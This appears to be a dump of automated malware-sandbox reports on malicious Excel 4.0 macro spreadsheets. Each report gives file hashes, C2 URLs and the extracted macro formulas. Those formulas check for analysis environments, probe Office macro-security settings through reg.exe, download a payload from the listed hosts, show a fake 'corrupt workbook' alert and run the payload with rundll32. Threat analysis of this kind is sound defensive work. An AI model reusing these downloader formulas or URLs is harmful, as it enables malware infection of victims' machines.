{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c8478c4d0b2882bffede8c8505ba9b9a1cc645be08e3ff224e2cedb13a708b7"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c8478c4d0b2882bffede8c8505ba9b9a1cc645be08e3ff224e2cedb13a708b7","filesize":209920,"md5":"3d1f24d862a9de1906d9e1a20a4ddd9c","sha1":"432b798b1e593ad9699183c721e14b369fcddbd9","sha256":"0c8478c4d0b2882bffede8c8505ba9b9a1cc645be08e3ff224e2cedb13a708b7","sha512":"d82ddb78c53363fe28053e1752447e195ce9385fb0a48b11d2e81684a53594aa4b7b196df2de3106d368a9ca108584d0e0f1286c9ff70e44450a41cc09728e34","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c8478c4d0b2882bffede8c8505ba9b9a1cc645be08e3ff224e2cedb13a708b7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xLXqEy6Ayn\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c97ad043e0b362195a14f8e564b2be216b6f8e1e88f1c4efb75189a8e7a105a"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c97ad043e0b362195a14f8e564b2be216b6f8e1e88f1c4efb75189a8e7a105a","filesize":214016,"md5":"7b9b9a91bf217c180e08621adefadad6","sha1":"964dfc8174649a77e2455fd1eb721fd2a4f62f21","sha256":"0c97ad043e0b362195a14f8e564b2be216b6f8e1e88f1c4efb75189a8e7a105a","sha512":"89f96dcb6e36f0f7dc9bbb2d1bda3ee82892b8c102598809fb0ee02943fc651acacc30b685dab22cb095ee9e9a6f2016cffd875d787bef0f31aafea08665cbe1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c97ad043e0b362195a14f8e564b2be216b6f8e1e88f1c4efb75189a8e7a105a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tYffQDjKX5\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0c9e1e8fcf8197522f477408b9354e3e94145d653820e0070f81480cf3dece65"},"analysis":{"reported":"2020-04-09T16:14:52Z","score":10},"files":[{"filename":"0c9e1e8fcf8197522f477408b9354e3e94145d653820e0070f81480cf3dece65","filesize":212992,"md5":"ae8ac970a1440bca6a656cd47f50a857","sha1":"b7268e8595598b779d6bd25d8ba26507d949541f","sha256":"0c9e1e8fcf8197522f477408b9354e3e94145d653820e0070f81480cf3dece65","sha512":"11322c64039a1002e8176e8e82868da9d25ea93826cbfa621d6805292d13b5681c81c55330976341bd935203fe24118715b2b2846cbbdfc36d34225525a5971d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0c9e1e8fcf8197522f477408b9354e3e94145d653820e0070f81480cf3dece65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aVt9vPOaFb\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0cabaad628180f9eae5e03828c8a38b917ce42e0d2ec632ad09c14ea411a21b0"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0cabaad628180f9eae5e03828c8a38b917ce42e0d2ec632ad09c14ea411a21b0","filesize":219136,"md5":"fbfa4479bdb039b11b42697f39a020ca","sha1":"70cb9addb11bc646b91e063a211910f0ebbe9ba0","sha256":"0cabaad628180f9eae5e03828c8a38b917ce42e0d2ec632ad09c14ea411a21b0","sha512":"ba55cd2168f9c752cfc499d7d8f76ff759330f45dc92357d719c113d4b85f674e0e086ca4d2dce39c60cec702275a69a3b5de8e25d465ff917d83513f7fa5b3b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0cabaad628180f9eae5e03828c8a38b917ce42e0d2ec632ad09c14ea411a21b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4K4ISxYPGd\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0cbc69ab49ab0f268fe6875b293f3fd7f5d92afc4421923f23f4954bd3bc37ef"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0cbc69ab49ab0f268fe6875b293f3fd7f5d92afc4421923f23f4954bd3bc37ef","filesize":209408,"md5":"8aad31753fe402be721c4ef6fe5181dc","sha1":"94373e4b1acf7e3ac6fdf328b47a143d10079559","sha256":"0cbc69ab49ab0f268fe6875b293f3fd7f5d92afc4421923f23f4954bd3bc37ef","sha512":"f7cf158e78771c3c649e71dd9a4af8dcfcec6beda9b3d776ee04aee288b5c6b46c8ebc38be15b04fc5e81526d4db6be9e460019c6678e06f45bf3909880d8bc2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0cbc69ab49ab0f268fe6875b293f3fd7f5d92afc4421923f23f4954bd3bc37ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kzXwRaPOQX\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0cf9b2a9da2885fa19dcd5dc070e373817088063e93e48c407abadb1c6cd8878"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0cf9b2a9da2885fa19dcd5dc070e373817088063e93e48c407abadb1c6cd8878","filesize":167936,"md5":"9d23a622984daf2c58a2bd2b676010b7","sha1":"4167d334d4932b8e829ef108e34e5e3c76f1451c","sha256":"0cf9b2a9da2885fa19dcd5dc070e373817088063e93e48c407abadb1c6cd8878","sha512":"70c790ea87afcfacf7c895c6f01f336f43ac1723f4f5b52f55d3e649c214b1fc5b2844310a40391cad5da415e2973c6bd7fc55e3b5e09439c11fa72db0a5f1b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0cf9b2a9da2885fa19dcd5dc070e373817088063e93e48c407abadb1c6cd8878.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3OASLIlTBw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0cfd54ec91a3c3e5df658d689bf647ceb73db5ed348679b28d1e549ec7747b65"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0cfd54ec91a3c3e5df658d689bf647ceb73db5ed348679b28d1e549ec7747b65","filesize":206336,"md5":"e39e854da0ced7a9af6a2e6f3eb547a9","sha1":"1cbb52d889d8c59ee2424b1bd168222aa138faf4","sha256":"0cfd54ec91a3c3e5df658d689bf647ceb73db5ed348679b28d1e549ec7747b65","sha512":"8dcf603e3d787fc7ffbe28519ae77681cad0875886c5813515ac0da33fd55583c2987c41da923b401e51fc6983535f45782455a32a53d5a9b6c8526b1996094d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0cfd54ec91a3c3e5df658d689bf647ceb73db5ed348679b28d1e549ec7747b65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KHzR50xpiK\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d0d5d35d30b38a153a233ce1b8fbd40316bf482dcba65dae9491f2f8d2e38bd"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d0d5d35d30b38a153a233ce1b8fbd40316bf482dcba65dae9491f2f8d2e38bd","filesize":185344,"md5":"7d3384c00271d18295a6e55ee264b52c","sha1":"4a51a0c3402de68f855cb0ab3e790315d8f95e7f","sha256":"0d0d5d35d30b38a153a233ce1b8fbd40316bf482dcba65dae9491f2f8d2e38bd","sha512":"cc0feea044bb9ca19bfd17a291cc5a6fe6eee375a2d00cfad7f9673dba73914812630222a88adc878f3aeaa6d23ea2f6337a8a301564eac49702b9ece6f94689","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d0d5d35d30b38a153a233ce1b8fbd40316bf482dcba65dae9491f2f8d2e38bd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d0df4e0aba90584f85c49e07e73dcdab4cc066f6b74d546240276adf885a357"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d0df4e0aba90584f85c49e07e73dcdab4cc066f6b74d546240276adf885a357","filesize":116224,"md5":"01c92579b6565ce91ff3d8563b9a640a","sha1":"6273a3036d3851fe1f6c37b8beef6b4e1b95c25b","sha256":"0d0df4e0aba90584f85c49e07e73dcdab4cc066f6b74d546240276adf885a357","sha512":"4687735f0beb4e4deea2aeb0719c6ed451d07e39afb85d8c68b03da9ff55992d5fdd2f50bc17a744711d80c976484cfe8192834e18f0b33987cfec9fc4c98fcc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d0df4e0aba90584f85c49e07e73dcdab4cc066f6b74d546240276adf885a357.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MDHVX6aeQ2\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d1b3c706935c7ff1127b3b7dd84deffbc58a452e741f5a918f28b97f961bc86"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d1b3c706935c7ff1127b3b7dd84deffbc58a452e741f5a918f28b97f961bc86","filesize":185344,"md5":"b54d0fdf59b9fb91d53e838101f1defa","sha1":"c19bb46008c25505c3a56daaaab35d46b488fe1c","sha256":"0d1b3c706935c7ff1127b3b7dd84deffbc58a452e741f5a918f28b97f961bc86","sha512":"263bdef6ead2b71283087c04ef50c4168661b23872538d60fbaed731267520e6465b66ad755abfd3a0da877751c1cbd3a2cd9a0dc79f1dde4bacc94057187f1a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d1b3c706935c7ff1127b3b7dd84deffbc58a452e741f5a918f28b97f961bc86.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d24f778bfd9ab706ca2a509db58a94099673020e64476e0f80ce1f5dadacb39"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d24f778bfd9ab706ca2a509db58a94099673020e64476e0f80ce1f5dadacb39","filesize":168448,"md5":"ea01aa6592720ed54638f0e5c94a9f31","sha1":"45aae6abd406b81a2adf07fc1d9a24a261b777b3","sha256":"0d24f778bfd9ab706ca2a509db58a94099673020e64476e0f80ce1f5dadacb39","sha512":"7c5d71fe2074c2bd508ccf0b64cf22633bd769385185d7627f000bc246eee1cff6109bd1de46e99a653a70ef38230c1f972eefaf5537f2baa261bf9e2a38efb0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d24f778bfd9ab706ca2a509db58a94099673020e64476e0f80ce1f5dadacb39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XRtJpwPnOS\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d30377fd0b52bf0d80c6fc493dae8c521a9ffb5be923ef1e15ce1a715281035"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d30377fd0b52bf0d80c6fc493dae8c521a9ffb5be923ef1e15ce1a715281035","filesize":206336,"md5":"3fb05aa8acdaf9a2fe6c6a2892ef7fea","sha1":"a797ceee73ee776307d8723869a182c44d9caaac","sha256":"0d30377fd0b52bf0d80c6fc493dae8c521a9ffb5be923ef1e15ce1a715281035","sha512":"0fc7ea0cbfb20565c670c98d71f91b6aae0d38322ce772bf0a9246c9788d65c66e9ce8431e19f6d0e24df29db0542f1ae9541ad85b5a44ec7bf9d176eae40d49","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d30377fd0b52bf0d80c6fc493dae8c521a9ffb5be923ef1e15ce1a715281035.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PZYQAf41c2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0d5af3953bc5c9966ae989d04ef40399aa089632ab4e7711c7669fdc86ba68ae"},"analysis":{"reported":"2020-04-09T16:14:53Z","score":10},"files":[{"filename":"0d5af3953bc5c9966ae989d04ef40399aa089632ab4e7711c7669fdc86ba68ae","filesize":167936,"md5":"57359c5e7ef512fae48d963526956406","sha1":"14175bc4268883f275b330353d9927121f1e737d","sha256":"0d5af3953bc5c9966ae989d04ef40399aa089632ab4e7711c7669fdc86ba68ae","sha512":"ba5ad6afb4357454986cf2a424d1eacffffd8f6f27dcc2065c84aa7f5ebfcf58968f63819a61f651997cc830d02b557527ea3ce13f8c501c27ce73afe9a8f324","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0d5af3953bc5c9966ae989d04ef40399aa089632ab4e7711c7669fdc86ba68ae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JpOJZqxdQw\",TRUE)\nGOTO(R$0C$19)"}}}]}
